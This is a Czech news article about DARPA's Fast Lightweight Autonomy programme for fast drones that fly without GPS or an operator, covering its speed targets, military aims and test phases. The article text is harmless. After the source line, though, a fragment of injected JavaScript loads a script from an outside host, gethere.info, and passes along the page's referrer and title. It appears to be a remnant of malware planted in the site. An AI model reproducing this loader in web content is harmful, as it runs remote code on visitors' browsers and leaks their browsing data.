UAV | UAS

DARPA chce rychlé, lehké a především samostatné drony

Jaké schopnosti očekává od dronů v rámci programu  The Fast Lightweight Autonomy (FLA), demonstrovala  americká DARPA (Defense Advanced Research Projects Agency | Agentura pro výzkum pokročilých obranných projektů) na videu zachycujícím let jestřába.

DARPA 22. prosince minulého roku zveřejnila specifikace programu Fast Lightweight Autonomy, který je zaměřen na zkoumání a vývoj rychlých algoritmů a softwaru pro senzorické, navigační/plánovací a řídicí systémy tak, aby byl drone schopen plně autonomního letu v nepřehledném a přeplněném prostředí. Třeba jako když pták prolétá lesem.

Agentura očekává, že by drone měl být s novým softwarem schopen při letu rychlostí až 20 m/s (72 km/h). Reálně se ovšem při výzkumu počítá s drony o rychlosti 45 km/h, doletem tisíc metrů, nesoucími 20W řídicí jednotku, které absolvují po startu let bez nutnosti komunikace s operátorem (pilotem) a bez údajů z GPS. Za touto neobvyklou formulací požadavku, která není čístě vojenského ražení, může stát potřeba snížit počet a riziko leteckých incidentů, před jejichž rostoucím počtem varoval americký úřad pro letectví FAA.

Nicméně to co DARPA požaduje, je samozřejmě primární využití pro obranný průmysl. Projekt má tedy v podstatě  vyvinout řešení pro zpracování velkého objemu dat v reálném čase tak, aby byl drone schopen samostatného pohybu na bojišti/území a dokázal bez zásahu obsluhy vyhodnotit ohrožení a vyhnout se mu nebo zvolit a upravit letovou trasu tak, aby došlo k optimánímu dosažení stanoveného cíle mise. To vše v prostředí nelineárního konfliktu, kdy řada střetů probíhá v městské zástavbě.

V první fázi v lertech 2015-2017 proto DARPA bude hodnotit úspěšnést dronů ve slalomu na otevřeném prostranství, uvnitř skladiště a kanceláří. Teprve ve druhé fázi příjde na řadu schopnost poradit si s dveřmi a okny.

Zdroj: DARPAs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

Hello world!

Další článek

Nové drony od Erle Robotics mají vlastního linuxového autopilota